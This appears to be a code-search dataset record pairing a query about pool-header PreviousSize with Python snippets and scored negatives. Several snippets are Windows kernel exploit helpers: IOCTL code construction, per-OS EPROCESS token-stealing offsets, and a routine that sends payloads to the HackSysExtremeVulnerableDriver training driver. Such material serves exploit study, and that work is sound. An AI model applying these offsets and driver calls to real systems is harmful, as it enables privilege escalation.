\"Trunk\"\n addPrm = {\"ThirdPartyDN\": thirdPartyDN, \"ThirdPartyDNRole\": thirdPartyDNRole}\n if not self.routeRequestOnQueued:\n ev = self.mayBeEvent(EventName.Diverted, pt, timeout=3, addPrm=addPrm)\n else:\n addPrmRU = {\"ReferenceID\": 0, \"Reasons\": None, \"ThirdPartyDN\": thirdPartyDN,\n \"ThirdPartyDNRole\": thirdPartyDNRole}\n ev = self.mayBeEvent(EventName.RouteUsed, pt, timeout=3, addPrm=addPrmRU)\n ev = self.mayBeEvent(EventName.Diverted, pt, timeout=3, addPrm=addPrm)\n if not ev:\n pt.postponedAbandonedOrDiverted = 1\n self.postponedAbandonedOrDiverted = self.postponedAbandonedOrDiverted + 1\n pt.removeFromCall()\n ringPt = overFlowDest.ring(call)\n return ringPt", "def request(self, flow: mitmproxy.http.HTTPFlow):", "def request(self, flow: mitmproxy.http.HTTPFlow):", "def forward_pass(self):", "def test_request_floodprotection(self, kasserver, kasapi):\n floodprotection = mock.PropertyMock(text=\"0.0\")\n kasapi.side_effect = [\n zeep.exceptions.Fault(\"flood_protection\", detail=floodprotection),\n mock.DEFAULT,\n ]\n kasserver._request(self.REQUEST_TYPE, self.REQUEST_PARAMS)\n assert 
kasapi.call_count == 2", "def response_handling(self) -> global___Snippet.StreamingResponseHandling:", "def response_handling(self) -> global___Snippet.StreamingResponseHandling:", "def squares_streaming_get():\n \n return 'do some magic!'", "def rest(self):\n\t\tpass", "def aiomanhole_start():\n if aiomanhole:\n aiomanhole.start_manhole(port=7113, namespace={\"qtile\": qtile})", "def box_mesh_with_hole(point1=Point(0,0,0), point2=Point(2,1,1), cyl_cent1 = Point(1, -10, 0.5), \n cyl_cent2= Point(1, 10, 0.5), cyl_rad=0.25, numpts=15):\n Router = mshr.Box(point1, point2)\n Rinner = mshr.Cylinder(cyl_cent1, cyl_cent2, cyl_rad, cyl_rad)\n domain = Router - Rinner\n\n mesh = mshr.generate_mesh(domain, numpts)\n print_mesh_stats(mesh)\n \n return mesh", "def response_space():", "def drip():\n args = CaseInsensitiveDict(request.args.items())\n duration = float(args.get(\"duration\", 2))\n numbytes = min(int(args.get(\"numbytes\", 10)), (10 * 1024 * 1024)) # set 10MB limit\n code = int(args.get(\"code\", 200))\n\n if numbytes <= 0:\n response = Response(\"number of bytes must be positive\", status=400)\n return response\n\n delay = float(args.get(\"delay\", 0))\n if delay > 0:\n time.sleep(delay)\n\n pause = duration / numbytes\n\n def generate_bytes():\n for i in xrange(numbytes):\n yield b\"*\"\n time.sleep(pause)\n\n response = Response(\n generate_bytes(),\n headers={\n \"Content-Type\": \"application/octet-stream\",\n \"Content-Length\": str(numbytes),\n },\n )\n\n response.status_code = code\n\n return response", "def server_streaming(self) -> global___Snippet.ServerStreaming:", "def ping():\r\n return make_response(\"pong!\", 200)" ]
[ "0.5570328", "0.5281889", "0.5272379", "0.5115745", "0.50628465", "0.50628465", "0.50479513", "0.4986393", "0.4922898", "0.49148694", "0.49118787", "0.48944783", "0.48906896", "0.48570713", "0.4851796", "0.48151433", "0.47973892", "0.47973892", "0.4777782", "0.47701412", "0.47643784", "0.47643784", "0.47630107", "0.47448343", "0.47387558", "0.47287935", "0.47245643", "0.4714223", "0.47093368", "0.46953785" ]
0.564251
0
Calculate the previous size value for the pool header. The PreviousSize value * 8 = previous chunk size
def calculate_previous_size(required_hole_size): return required_hole_size/8
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def prev_size(self):\n return self.state.memory.load(self.base, self._chunk_size_t_size) & ~CHUNK_FLAGS_MASK", "def pupil_size(self):\n\t\t\n\t\t# get newest pupil size\n\t\tps = self.eyetribe.pupil_size()\n\t\t\n\t\t# invalid data\n\t\tif ps == None:\n\t\t\treturn -1\n\t\t\n\t\t# check if the new pupil size is the same as the previous\n\t\tif ps != self.prevps:\n\t\t\t# update the pupil size\n\t\t\tself.prevps = copy.copy(ps)\n\t\t\n\t\treturn self.prevps", "def _make_chunk_size(self, req_size):\n size = req_size\n size += 2 * self._chunk_size_t_size # Two size fields\n size = self._chunk_min_size if size < self._chunk_min_size else size\n if size & self._chunk_align_mask: # If the chunk would not be aligned\n size = (size & ~self._chunk_align_mask) + self._chunk_align_mask + 1 # Fix it\n return size", "def chunk_size(self) -> global___Expression:", "def __get_size(self):\n\t\treturn 4*self.version + 17", "def prev_chunk(self):\n if self.is_prev_free():\n return PTChunk(self.base - self.prev_size(), self.state)\n else:\n raise SimHeapError(\"Attempted to access the previous chunk, but it was not free\")", "def update_size(self):\n return 3 + self.memory_unit_size", "def check_size(prev, current, delta):\n before = prev.pools[0].used\n after = current.pools[0].used\n assert delta == (before - after) >> 20", "def _total_chunk_size_left(self):\n if self.streaming_type == 'reshape':\n return self.N_l // self.conv_factor\n elif self.streaming_type == 'mask':\n return self.N_l // self.conv_factor * self.n_layers\n elif self.unidir:\n return 10000 // self.conv_factor\n else:\n return 10000 // self.conv_factor", "def __header_size(self):\n return self.SIZE_LINEUPS + self.SIZE_PLAYERS_PER_LINEUP", "def calc_size(self):\r\n pass", "def header_size(self):\n return 5", "def get_size(self):\n return len(self.get_payload()) + 4", "def get_msg_size(self):\n return self.MsgSize - self.header_size", "def getSize(self, withPool=False):\r\n if not withPool: return self.func.end_ea - self.func.start_ea\r\n head = self.func.end_ea\r\n\r\n # check if the function is set to have no pool\r\n instSize = self.isThumb() and 2 or 4\r\n endCmt = idc.Comment(self.func.end_ea-instSize)\r\n if endCmt and '<endpool>' in endCmt:\r\n return self.func.end_ea - self.func.start_ea\r\n\r\n while not idc.isCode(idc.GetFlags(head)) :\r\n # manual pool computation, trust and assume that this is the last element in the pool!\r\n if idc.Comment(head) and '<endpool>' in idc.Comment(head):\r\n head += idc.get_item_size(head)\r\n break\r\n # advance to next data element\r\n head += idc.get_item_size(head)\r\n\r\n return head - self.func.start_ea", "def get_num_chunks(self) -> int:", "def hbins_size(self):\n return self.unpack_dword(0x28)", "def getSize(self) -> long:\n ...", "def get_size(self):\n tmpsize = 0\n for variable in self.variables:\n tmpsize += variable.get_size()\n for subchunk in self.subchunks:\n tmpsize += subchunk.get_size()\n self.size.value = tmpsize\n return self.size.value + self.ID.get_size() + self.size.get_size()", "def __payload_size(self):\n return (\n self.SIZE_LINEUP_ID + self.players_per_lineup * self.SIZE_PLAYER) * self.entries.count()", "def size(self):\r\n return self.size.data", "def block_size(self, block_id): # -> int:\n ...", "def getSize(self) -> int:\n ...", "def getSize(self) -> int:\n ...", "def __len__(self):\n # Header + len(group id) + group id + generation id\n size = self.HEADER_LEN + 2 + len(self.group_id) + 4\n # + len(member id) + member id\n size += 2 + len(self.member_id)\n return 
size", "def size(self):\n # IP header has a minimum size of 20 bytes:\n # - 1 byte for version + IHL\n # - 1 byte for DSCP + ECN\n # - 2 bytes for total length\n # - 2 bytes for identification\n # - 2 bytes for flags + fragment offset\n # - 1 byte for TTL\n # - 1 byte for transport protocol type\n # - 2 bytes for header Checksum\n # - 8 bytes, 2 for each IP address\n return 20 + self.segment.size()", "def pending_nb_bytes(self):\n if self.df_length is not None:\n if self.df_length > 0:\n return self.df_length - len(self.buf)\n\n if self.cf_length is not None:\n if self.cf_length > 0:\n return self.cf_length - len(self.buf)\n \n return 4", "def get_step_size(self):\r\n msg = struct.pack('>2B', 56, 6)\r\n response = self.query(msg)\r\n return response[1]", "def payload_length(self):\n return self.total_length - self.headers_length - _PRELUDE_LENGTH - 4", "def get_size(self):" ]
[ "0.76720065", "0.6390554", "0.6259835", "0.62144953", "0.62106663", "0.6186286", "0.6185693", "0.61436164", "0.61312467", "0.60515755", "0.6026793", "0.58546066", "0.58413696", "0.58153194", "0.58138615", "0.5797905", "0.57794654", "0.5769273", "0.5755982", "0.57471156", "0.5725521", "0.57137173", "0.57094747", "0.57094747", "0.57023764", "0.5693946", "0.56827754", "0.5682293", "0.5672089", "0.56705594" ]
0.71780765
1
Recreate CTL_CODE macro to generate driver IOCTL
def ctl_code(function, devicetype = FILE_DEVICE_UNKNOWN, access = FILE_ANY_ACCESS, method = METHOD_NEITHER): return ((devicetype << 16) | (access << 14) | (function << 2) | method)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mdlintf_ioctl(module_name: str, data: IOCTLData):\n\tmodule = get_module(module_name)\n\tif module is None:\n\t\treturn MODULE_IOCTL_RESULT_MODULE_NOT_FOUND\n\n\treturn module.ioctl(data)", "def _generate_os_code(self, name, version, bits, extra_info):\r\n name = name.replace(' Linux', '')\r\n name = name.replace('Enterprise', '')\r\n name = name.replace('GNU/Linux', '')\r\n\r\n os_code = name.strip().replace(' ', '_').upper()\r\n\r\n if os_code.startswith('RED_HAT'):\r\n os_code = 'REDHAT'\r\n\r\n if 'UBUNTU' in os_code:\r\n version = re.sub(r'\\.\\d+', '', version)\r\n\r\n os_code += '_' + version.replace('.0', '')\r\n\r\n if bits:\r\n os_code += '_' + bits\r\n\r\n if extra_info:\r\n garbage = ['Install', '(32 bit)', '(64 bit)']\r\n\r\n for obj in garbage:\r\n extra_info = extra_info.replace(obj, '')\r\n\r\n os_code += '_' + extra_info.strip().replace(' ', '_').upper()\r\n\r\n return os_code", "def accelerator_string():\n if is_mac():\n return \"Command\"\n else:\n return \"Ctrl\"", "def get_opcode(self, code):\r\n opcode = int(str(code)[-2:])\r\n return opcode", "def read_idcode_opcode(device, idcode_opcode):\n opcode_length = len(idcode_opcode)\n data = bytearray()\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b11111)) # go to reset\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b00110)) # go to shift-ir\n data.extend((WRITE_BITS_NVE_LSB, opcode_length - 2, int(idcode_opcode))) # shift IDCODE opcode\n data.extend((WRITE_BITS_TMS_NVE, 4, 0b00111)) # go to shift-dr\n data.extend((READ_BYTES_NVE_LSB, 3, 0)) # read command\n device.write(bytes(data)) # send off MPSSE commands\n idcode = device.read(4)[::-1]\n return \"\".join(format(byte, \"08b\") for byte in idcode)", "def send_ioctls(self):\n fd = self._fd\n fcntl.ioctl(fd, UI_SET_EVBIT, EV_SYN) # 0,0,0\n if self._keys: # can be an iterable\n fcntl.ioctl(fd, UI_SET_EVBIT, EV_KEY) # is keyboard\n fcntl.ioctl(fd, UI_SET_EVBIT, EV_MSC) # used, but ?\n if getattr(self._keys, '__iter__', False):\n for v in self._keys:\n fcntl.ioctl(fd, UI_SET_KEYBIT, v)\n else:\n KEY_MAX = 767 # 0x2ff\n for k,v in scancodes.__dict__.items():\n # add every recognised key\n if v < KEY_MAX and k.startswith('KEY_'):\n fcntl.ioctl(fd, UI_SET_KEYBIT, v)\n if self._mouserel: # enable relative mouse movement\n fcntl.ioctl(fd, UI_SET_EVBIT, EV_REL) # is relative device\n fcntl.ioctl(fd, UI_SET_RELBIT, REL_X)\n fcntl.ioctl(fd, UI_SET_RELBIT, REL_Y)\n if self._mouseabs:\n fcntl.ioctl(fd, UI_SET_EVBIT, EV_ABS) # is absolute device\n if getattr(self._mouseabs, '__iter__', False):\n for v in self._mouseabs:\n fcntl.ioctl(fd, UI_SET_KEYBIT, v)\n else:\n fcntl.ioctl(fd, UI_SET_KEYBIT, BTN_TOUCH)\n fcntl.ioctl(fd, UI_SET_KEYBIT, BTN_STYLUS)\n fcntl.ioctl(fd, UI_SET_KEYBIT, BTN_TOOL_PEN)\n fcntl.ioctl(fd, UI_SET_KEYBIT, BTN_TOOL_FINGER)\n fcntl.ioctl(fd, UI_SET_KEYBIT, BTN_TOOL_MOUSE)\n if self._mouserel or self._mouseabs:\n for v in ButtonDefaults:\n fcntl.ioctl(fd, UI_SET_KEYBIT, v)", "def _get_code_command_linux():\n print('Use arrows (or \\'E\\', \\'S\\', \\'W\\',' +\\\n '\\'N\\' + a number) to move or \\'q\\' to give up.')\n return get_char_code.get()", "def device_io_control(hDevice, ioControlCode, input_buffer, output_buffer):\n if input_buffer:\n input_size = len(input_buffer)\n else:\n input_size = 0\n\n if isinstance(output_buffer, int):\n output_buffer = ctypes.create_string_buffer(output_buffer)\n\n output_size = len(output_buffer)\n assert isinstance(output_buffer, ctypes.Array)\n bytesReturned = ctypes.wintypes.DWORD()\n\n status = DeviceIoControl(hDevice, ioControlCode, 
input_buffer, input_size,\n output_buffer, output_size, bytesReturned, None)\n\n if status != 0:\n return output_buffer[:bytesReturned.value]\n else:\n return None", "def at_ctrl(seq, num):\n at(\"CTRL\", seq, [num, 0])", "def command(dev, code, data='', verbose=False):\n communicate(dev, a2b_hex('A' + code) + data.encode('ascii'), a2b_hex('B' + code), verbose=verbose)", "def _send_payload(payload_ptr, payload_len, code):\n \n FILE_DEVICE_UNKNOWN = 0x22\n FILE_ANY_ACCESS = 0\n METHOD_NEITHER = 3\n\n # Recreate CTL_CODE macro to generate driver IOCTL \n ctl_code = (\n (FILE_DEVICE_UNKNOWN << 16) |\n (FILE_ANY_ACCESS << 14) | \n (code << 2) | \n METHOD_NEITHER\n )\n\n # Create handle to driver \"\"\"\n handle = kernel32.CreateFileA(\n \"\\\\\\\\.\\\\HackSysExtremeVulnerableDriver\", # lpFileName\n 0xC0000000, # dwDesiredAccess\n 0, # dwShareMode\n None, # lpSecurityAttributes\n 0x3, # dwCreationDisposition\n 0, # dwFlagsAndAttributes\n None # hTemplateFile\n )\n\n IO_CTL = kernel32.DeviceIoControl(\n handle, # hDevice\n ctl_code, # dwIoControlCode\n payload_ptr, # lpInBuffer\n c_int(payload_len), # nInBufferSize\n None, # lpOutBuffer\n 0, # nOutBufferSize\n byref(c_ulong()), # lpBytesReturned\n None # lpOverlapped\n )\n \n return kernel32.CloseHandle(handle)", "def _build_menu_command(self, cmd):\n if COMMAND_CHAR[cmd]:\n return COMMAND_CHAR[cmd]+self._newline\n else:\n raise InstrumentProtocolException(\"Unknown command character for %s\" % cmd)", "def set_control(self, control):\n self.o.write_register(self.dev_id, CONTROL, control)", "def encode(self):\n fctrl = 0 | (self.adr << 7) | (self.adrackreq << 6) \\\n | (self.ack << 5) | (self.fpending << 4) \\\n | (self.foptslen & 15)\n data = struct.pack('<LBH', self.devaddr, fctrl, self.fcnt) + self.fopts\n return data", "def _generate_windows_code(self, description):\r\n version_check = re.search(r'Windows Server (\\d+)', description)\r\n version = version_check.group(1)\r\n\r\n os_code = 'WIN_' + version\r\n\r\n if 'Datacenter' in description:\r\n os_code += '-DC'\r\n elif 'Enterprise' in description:\r\n os_code += '-ENT'\r\n else:\r\n os_code += '-STD'\r\n\r\n if 'ith R2' in description:\r\n os_code += '-R2'\r\n elif 'ith Hyper-V' in description:\r\n os_code += '-HYPERV'\r\n\r\n bit_check = re.search(r'\\((\\d+)\\s*bit', description)\r\n if bit_check:\r\n os_code += '_' + bit_check.group(1)\r\n\r\n return os_code", "def gen_cheader(protocol):\n\ts = \"\"\"/* Junior Design Sp2018 Final Project\n * Robot Firmware - RPi <-> Microcontroller Communication\n * Nick Ames 2018\n * WARNING: This file is automatically generated by gen-files.py\n * Any changes you make will be erased.\n */\n#include <stdfix.h>\n#include <stdint.h>\n#include \"config.h\"\n\n\"\"\"\n\ts += \"struct comm_data_t {\\n\"\n\tfor r in protocol:\n\t\ts += \"\\t\" + r.size + \" \" + r.name + \"; /* \" + r.desc + \" */\\n\"\n\ts += \"};\\n\\n\"\n\tfor r in protocol:\n\t\ts += \"%s get_%s(void); /* %s */\\n\"%(r.size, r.name, r.desc)\n\t\ts += \"void set_%s(%s); /* %s */\\n\\n\"%(r.name, r.size, r.desc)\n\ts += \"\"\"extern volatile struct comm_data_t Data;\"\"\"\n\treturn s", "def _write_cmd(self, cmd):\n cmd = cmd & 0x0fff\n for i in range(12):\n j = cmd & 0x0800\n cmd = cmd << 1\n j = j >> 11\n self.wr(0)\n self.data(j)\n self.wr(1)", "def decode_kernel_path(entry_type, word_int, capreg_int):\n if entry_type == KernelEntryType.Interrupt:\n return \"IRQ #{}\".format(word_int)\n elif entry_type == KernelEntryType.UnknownSyscall:\n if word_int & 0xF == 
SyscallType.DebugPutChar.value[0]:\n return \"DebugPutChar: {}\".format(chr(capreg_int))\n else:\n return \"word = {}\".format(word_int)\n elif entry_type == KernelEntryType.VMFault:\n return \"fault_type = {}\".format(word_int)\n elif entry_type == KernelEntryType.UserLevelFault:\n return \"fault_number = {}\".format(word_int)\n elif entry_type == KernelEntryType.DebugFault:\n return \"fault_vaddr = {}\".format(hex(word_int))\n elif entry_type == KernelEntryType.Syscall:\n word_int <<= 3\n word_bytes = word_int.to_bytes(4, byteorder='big')\n tuple_of_data = unpack(\"u17u1u7u4u3\", word_bytes)\n (invoc_tag, is_fastpath, cap_type, syscall_no, _) = tuple_of_data\n invoc = \"\"\n cap = \"\"\n try:\n invoc = InvocationType(invoc_tag)\n except:\n invoc = \"?\"\n try:\n cap = CapType(cap_type)\n except:\n cap = \"?\"\n return \"{} - [{}, fp:{}, {}]\".format(SyscallType(syscall_no), cap, is_fastpath, invoc)\n\n return \"Unknown\"", "def get_kernel_path_tag(entry_type, word_int, capreg_int):\n if entry_type == KernelEntryType.UnknownSyscall:\n if word_int & 0xF == SyscallType.DebugPutChar.value[0]:\n return chr(capreg_int)\n return None", "def _build_robovac_command(mode, command):\n mcu_ota_header_0xa5 = 0xA5\n cmd_data = (mode.value + command.value)\n\n return bytes([mcu_ota_header_0xa5, mode.value, command.value, cmd_data, 0xFA])", "def init_cmd( cmd_num=0):\n if cmd_num in [12,16,2,4,9,10,13,17,18,24]:\n log.warning(\"Command %d is not supported on SDIO, sending anyway but what are you doing?!\" %cmd_num)\n\n cmd = BinaryValue(bits=48,bigEndian=False)\n cmd[47] = 0 # Start value\n cmd[46] = 1 # Direction , 1 = towards device, 0 = towards host\n cmd[45:40] = BinaryValue(value=cmd_num, bits=6, bigEndian=False).integer\n cmd[0] = 1 # Stop bit\n return cmd", "def controller(code):\n\n def register_controller(func):\n CONTROLLERS[code] = func\n return func\n\n return register_controller", "def _build_return_code_enum():\n prefix = 'XTT_RETURN_'\n codes = {k[len(prefix):]:v for (k, v) in vars(_lib).items() if k.startswith(prefix)}\n return IntEnum('ReturnCode', codes)", "def _build_command(self, code_command):\n if code_command == 'end':\n return roboc_command.RobocCommandExit()\n elif code_command[0] == 'E':\n return roboc_command.RobocMoveEast(int(code_command[1:]))\n elif code_command[0] == 'W':\n return roboc_command.RobocMoveWest(int(code_command[1:]))\n elif code_command[0] == 'S':\n return roboc_command.RobocMoveSouth(int(code_command[1:]))\n elif code_command[0] == 'N':\n return roboc_command.RobocMoveNorth(int(code_command[1:]))\n else:\n print(code_command)\n raise ValueError()", "def gen_python(protocol):\n\ts = \"\"\n\tfor r in protocol:\n\t\tif r.write:\n\t\t\ts += \"def set_%s(value): #%s\\n\"%(r.name, r.desc)\n\t\t\ts += \"\\twrite_reg_raw(%d, \\\"%s\\\", value)\\n\\n\"%(r.number, r.size)\n\t\tif r.read:\n\t\t\ts += \"def get_%s(): #%s\\n\"%(r.name, r.desc)\n\t\t\ts += \"\\treturn read_reg_raw(%d, \\\"%s\\\")\\n\\n\"%(r.number, r.size)\n\treturn s", "def get_control(self):\n return self.o.read_register(self.dev_id, CONTROL)", "def uCSIsBuhid(code):\n ret = libxml2mod.xmlUCSIsBuhid(code)\n return ret", "def register_view_op_c_code(type, code, version=()):\r\n ViewOp.c_code_and_version[type] = (code, version)", "def set_csi_code(self, command, params=[]):\n if command == 'm': # SGR - Select Graphic Rendition\n if params:\n for code in params:\n self.set_sgr_code(code)\n else:\n self.set_sgr_code(0)\n\n elif (command == 'J' or # ED - Erase Data\n command == 'K'): # EL - Erase in Line\n 
code = params[0] if params else 0\n if 0 <= code <= 2:\n area = 'screen' if command == 'J' else 'line'\n if code == 0:\n erase_to = 'end'\n elif code == 1:\n erase_to = 'start'\n elif code == 2:\n erase_to = 'all'\n self.actions.append(EraseAction('erase', area, erase_to))\n\n elif (command == 'S' or # SU - Scroll Up\n command == 'T'): # SD - Scroll Down\n dir = 'up' if command == 'S' else 'down'\n count = params[0] if params else 1\n self.actions.append(ScrollAction('scroll', dir, 'line', count))", "def write_vk(self, vk_code):\n\n seq = u(\"\\x1b[\") + u(str(vk_code)) + u(\"VK\")\n self.write(seq)" ]
[ "0.55158716", "0.5302109", "0.52316815", "0.5207737", "0.51624715", "0.5111562", "0.5089443", "0.5063132", "0.4975058", "0.4945792", "0.49401814", "0.491681", "0.49117205", "0.4888804", "0.4862059", "0.48531878", "0.48450512", "0.4811114", "0.48106492", "0.48064867", "0.4805722", "0.48000187", "0.47702843", "0.4765244", "0.47636417", "0.4745468", "0.47319442", "0.47097775", "0.4696471", "0.4695514" ]
0.647903
0
Set various structure variables based on OS version
def setosvariablesx64(): KPROCESS = '' FLINK = '' UPID = '' TOKEN = '' version = sys.getwindowsversion() if((version.major == 5) and (version.minor == 2)): # the target machine's OS is Windows Server 2003 print "[*] OS version: Windows Server 2003" KPROCESS = '\x68' TOKEN = '\x60\x01' #0x160 UPID = '\xd8\x00' FLINK = '\xe0\x00' elif((version.major == 6) and (version.minor == 1) and ('1' in version.service_pack)): # the target machine's OS is Windows 7x64 SP1 #tbd print "[*] OS version: Windows 7x64 SP1" KPROCESS = '\x70' TOKEN = '\x08\x02' #0x208 UPID = '\x80\x01' #180 FLINK = '\x88\x01' #188 else: print "[-] No matching OS version, exiting..." sys.exit(-1) return (KPROCESS,FLINK,UPID,TOKEN)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse_os(self) -> None:\n if not self.os:\n self.os = OS(\n self.user_agent,\n self.ua_hash,\n self.ua_spaceless,\n self.VERSION_TRUNCATION,\n ).parse()\n self.all_details['os'] = self.os.ua_data", "def get_platform(init):\n\n platform = {}\n tmp = re.sub(r'([a-zA-Z])([0-9.])', r'\\1 \\2', re.sub(r'([,_;:-])', '.', init))\n\n split = tmp.split(\" \")\n if len(split) > 1 and split[0].lower().startswith(\"win\"):\n platform['os'] = \"Windows\"\n platform['version'] = split[1]\n elif tmp == \"VISTA\":\n platform['os'] = \"Windows\"\n platform['version'] = \"Vista\"\n else:\n platform['os'] = tmp.title()\n platform['version'] = None\n return platform", "def setosvariablesx86():\n\tKPROCESS = ''\n\tAPLINKS = ''\n\tUPID = ''\n\tTOKEN = ''\n\tversion = sys.getwindowsversion()\n\n\tif((version.major == 5) and (version.minor == 1) and ('3' in version.service_pack)):\n\t\t# the target machine's OS is Windows XP SP3\n\t\tprint \"[*] OS version: Windows XP SP3\"\n\t\tKPROCESS = '\\x44'\n\t\tTOKEN\t= '\\xC8'\n\t\tUPID\t = '\\x84'\n\t\tAPLINKS = '\\x88'\n \n\telif((version.major == 5) and (version.minor == 2) and ('2' in version.service_pack)):\n\t\t# the target machine's OS is Windows Server 2003 SP2\n\t\tprint \"[*] OS version: Windows Server 2003 SP2\"\n\t\tKPROCESS = '\\x38'\n\t\tTOKEN\t= '\\xD8'\n\t\tUPID\t = '\\x94'\n\t\tAPLINKS = '\\x98'\n \n\telif((version.major == 6) and (version.minor == 0) and ('1' in version.service_pack or '2' in version.service_pack) and (version.product_type == VER_NT_WORKSTATION)):\n\t\t# the target machine's OS is Windows Vista SP1 / SP2\n\t\tprint \"[*] OS version: Windows Vista SP1 / SP2\"\n\t\tKPROCESS = '\\x48'\n\t\tTOKEN\t= '\\xE0'\n\t\tUPID\t = '\\x9C'\n\t\tAPLINKS = '\\xA0'\n \n\telif((version.major == 6) and (version.minor == 0) and ('1' in version.service_pack or '2' in version.service_pack) and (version.product_type != VER_NT_WORKSTATION)):\n\t\t# the target machine's OS is Windows Server 2008 / SP2\n\t\tprint \"[*] OS version: Windows Server 2008 / SP2\"\n\t\tKPROCESS = '\\x48'\n\t\tTOKEN\t= '\\xE0'\n\t\tUPID\t = '\\x9C'\n\t\tAPLINKS = '\\xA0'\n \n\telif((version.major == 6) and (version.minor == 1)):\n\t\t# the target machine's OS is Windows 7 / SP1\n\t\tprint \"[*] OS version: Windows 7 / SP1\"\n\t\tKPROCESS = '\\x50'\n\t\tTOKEN\t= '\\xF8'\n\t\tUPID\t = '\\xB4'\n\t\tAPLINKS = '\\xB8'\n\t\n\telse:\n\t\tprint \"[-] No matching OS version, exiting...\"\n\t\tsys.exit(-1)\n\t\n\treturn (KPROCESS,APLINKS,UPID,TOKEN)", "def __init__(__self__, *,\n os_version: Optional[pulumi.Input['WindowsNodeConfigOsVersion']] = None):\n if os_version is not None:\n pulumi.set(__self__, \"os_version\", os_version)", "def _init_obo_version(self, line):\n if line[0:14] == \"format-version\":\n self.format_version = line[16:-1]\n if line[0:12] == \"data-version\":\n self.data_version = line[14:-1]", "def set_version(self, protocol_version):\n self.version = protocol_version\n self.version_bytes = str(protocol_version).encode(\"latin1\")\n self.version_header = self.version_bytes + PROTOCOL_3x_HEADER\n if protocol_version == 3.2: # 3.2 behaves like 3.3 with type_0d\n # self.version = 3.3\n self.dev_type = \"type_0d\"\n elif protocol_version == 3.4:\n self.dev_type = \"v3.4\"", "def init_linuxVersion(self):\n releaseDic = collections.OrderedDict() # 排序的字典\n releaseDic['/etc/oracle-release'] = self.__getOracleVersion\n releaseDic['/etc/redhat-release'] = self.__getRedhatVersion\n releaseDic['/etc/debian_version'] = self.__getDebianVersion\n releaseDic['/etc/SuSE-release'] = 
self.__getSuSEVersion\n # for releaseFilePath in releaseDic.keys():\n # print(releaseFilePath)\n #\n # releaseDic = {'/etc/oracle-release': self.__getOracleVersion,\n # '/etc/redhat-release': self.__getRedhatVersion,\n # '/etc/debian_version': self.__getDebianVersion,\n # '/etc/SuSE-release': self.__getSuSEVersion}\n for releaseFilePath in releaseDic.keys():\n ret, resultErr = self.ksp_ssh.ssh_execute_command(\n '[[ -f %s ]] && echo \"exist\" || echo \"not exist\"' % releaseFilePath)\n if 'not' in ret:\n continue\n else:\n return releaseDic.get(releaseFilePath, self.__getNullVersion)()\n return \"unknownVendor\", \"unknownRelease\"", "def osversion():\n return platform()", "def __init__(self):\n self.update_os_packages()\n self.upgrade_os_packages()", "def set_os_version(self, nVmOsVersion):\n\t\tcall_sdk_function('PrlVmCfg_SetOsVersion', self.handle, nVmOsVersion)", "def version():\n g.data['oar_server_version'] = VERSION\n g.data['oar_version'] = VERSION\n g.data['oar_lib_version'] = VERSION\n g.data['api_version'] = API_VERSION\n g.data['apilib_version'] = API_VERSION", "def _set_version(args: Any):\n if args['msc']:\n version = 'msc'\n elif args['nx']:\n version = 'nx'\n elif args['optistruct']:\n version = 'optistruct'\n elif args['nasa95']:\n version = 'nasa95'\n elif args['mystran']:\n version = 'mystran'\n else:\n version = None\n args['version'] = version\n del args['msc'], args['nx'], args['nasa95'], args['mystran'], args['optistruct']", "def get_system_information(self):\n\t\tsys = platform.uname()\n\t\treturn {\n\t\t\t'hostname': sys.node,\n\t\t\t'operating_system': sys.system,\n\t\t\t'version': sys.version,\n\t\t\t'release': sys.release,\n\t\t\t'processor' : sys.processor,\n\t\t\t'processor_type': sys.machine,\n\t\t}", "def gather_system_versions(self):\n # Get Mac model ID\n self.hw_version = str(\n IORegistryEntryCreateCFProperty(\n IOServiceGetMatchingService(\n 0,\n IOServiceMatching(\"IOPlatformExpertDevice\")),\n \"model\",\n None,\n 0)).replace(\n \"\\x00\",\n \"\")\n\n if \"imacpro\" in self.hw_version.lower():\n # iMac Pro stores it's EFI data different due it's new architecture\n # so grab the EFI & SMC ROM versions appropriately\n raw_efi_list = []\n raw_rom_info = str(\n IORegistryEntryCreateCFProperty(\n IORegistryEntryFromPath(\n 0,\n \"IODeviceTree:/rom\"),\n \"apple-rom-info\",\n None,\n 0))\n for data in raw_rom_info.split(\"\\n\"):\n if data.strip().startswith(\"BIOS ID\"):\n raw_efi_list = data.split(\":\")[1].strip().split(\".\")\n break\n else:\n self.message(\n \"[-] Could not find raw EFI data to determine EFI versions. 
Exiting....\")\n return False\n\n self.efi_version = \"%s.%s.%s\" % (\n raw_efi_list[0], raw_efi_list[2], raw_efi_list[3])\n # Can't currently find the SMC version like this on imac pros ....\n # self.smc_version = str(IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0, IOServiceMatching(\"AppleSMC\")), \"smc-version\", None, 0))\n self.smc_version = \"\"\n else:\n # EFI & SMC ROM versions\n self.smc_version = str(\n IORegistryEntryCreateCFProperty(\n IOServiceGetMatchingService(\n 0,\n IOServiceMatching(\"AppleSMC\")),\n \"smc-version\",\n None,\n 0))\n raw_efi = str(\n IORegistryEntryCreateCFProperty(\n IORegistryEntryFromPath(\n 0,\n \"IODeviceTree:/rom\"),\n \"version\",\n None,\n 0)).replace(\n \"\\x00\",\n \"\").split(\".\")\n self.efi_version = \"%s.%s.%s\" % (\n raw_efi[0], raw_efi[2], raw_efi[3])\n\n # Set the salt to be the MAC address of the system, using the MAC as a salt in this manner\n # helps ensure that the hashed sysuuid is pseudonymous. We don't want to know the sysuuid's\n # value, but we do want it to be unique however. The Salt value is\n # never submitted to the API\n salt = hex(getnode())\n sys_uuid = str(\n IORegistryEntryCreateCFProperty(\n IOServiceGetMatchingService(\n 0,\n IOServiceMatching(\"IOPlatformExpertDevice\")),\n \"IOPlatformUUID\",\n None,\n 0)).replace(\n \"\\x00\",\n \"\")\n self.h_sys_uuid = hashlib.sha256(salt + sys_uuid).hexdigest()\n\n # Get the Board-ID, this is how EFI files are matched to running\n # hardware - Nastee\n self.board_id = str(\n IORegistryEntryCreateCFProperty(\n IOServiceGetMatchingService(\n 0,\n IOServiceMatching(\"IOPlatformExpertDevice\")),\n \"board-id\",\n None,\n 0)).replace(\n \"\\x00\",\n \"\")\n\n # Get OS version\n self.os_version = commands.getoutput(\"sw_vers -productVersion\")\n\n # Get build number\n self.build_num = 